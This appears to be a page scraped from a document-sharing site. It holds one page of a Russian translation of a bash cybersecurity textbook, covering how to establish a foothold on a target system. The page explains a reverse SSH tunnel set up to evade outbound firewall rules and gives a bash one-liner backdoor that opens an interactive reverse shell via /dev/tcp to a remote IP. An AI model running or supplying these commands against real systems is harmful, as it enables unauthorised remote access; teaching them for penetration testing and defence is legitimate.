Paul Troncone and Carl Albing Cybersecurity Ops with bash Attack, Defend, and Analyze from the Command Line



Download 4,82 Mb.
Pdf ko'rish
bet172/206
Sana29.03.2022
Hajmi4,82 Mb.
#515317
1   ...   168   169   170   171   172   173   174   175   ...   206
Bog'liq
Bash и кибербезопасность Атака, защита и анализ из командной строки


Глава 16. Создание точки опоры
235
Рис. 16.2.
Обратное SSH-соединение
Настройка.обратного.SSH-соединения.в.целевой.системе:
ssh -R 12345:localhost:22 user@remoteipaddress
Опция.
-R
.включает.переадресацию.удаленных.портов..Первое.число,.
12345
,.указывает.
номер.порта,.который.удаленная.система.(злоумышленник).будет.использовать.для.
обратного.SSH-соединения.с.целевой.системой..Аргумент.
localhost:22
.определяет.но-
мер.порта,.который.целевая.система.будет.прослушивать,.чтобы.получить.соединение.
Это,.по.сути,.создает.исходящее.соединение.от.целевой.системы.к.серверу.SSH,.
что.позволит.злоумышленнику.создать.обратное.SSH-соединение.с.целевой.си-
стемой..Создав.такое.SSH-соединение.(от.сервера.к.клиенту),.злоумышленник.
сможет.удаленно.выполнять.команды.в.целевой.системе..Поскольку.подключение.
было.инициировано.целевым.объектом,.оно,.скорее.всего,.не.будет.ограничиваться.
правилами.брандмауэра,.находящегося.в.сети.целевого.объекта,.поскольку.пра-
вила.фильтрации.исходящего.трафика.обычно.не.настолько.строгие,.как.правила.
фильтрации.входящего.трафика.
Чтобы.создать.обратное.SSH-соединение.с.атакующей.системой.после.подключе-
ния.к.цели,.можно.написать.следующее:
ssh localhost -p 12345
Обратите.внимание:.чтобы.завершить.подключение.к.целевой.системе,.вам.нужно.
будет.предоставить.учетные.данные.для.входа.
Бэкдор bash
Основная.функция.инструмента.удаленного.доступа.—.создание.сетевого.подклю-
чения..Как.показано.в.главе.10,.bash.позволяет.создавать.сетевые.подключения.с.по-
мощью.специальных.обработчиков.файлов.
/dev/tcp
.и.
/dev/udp
..Эту.возможность.
также.можно.использовать.для.настройки.удаленного.доступа.в.целевой.системе:
/bin/bash -i < /dev/tcp/192.168.10.5/8080 1>&0 2>&0


236
Download 4,82 Mb.

Do'stlaringiz bilan baham:
1   ...   168   169   170   171   172   173   174   175   ...   206




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish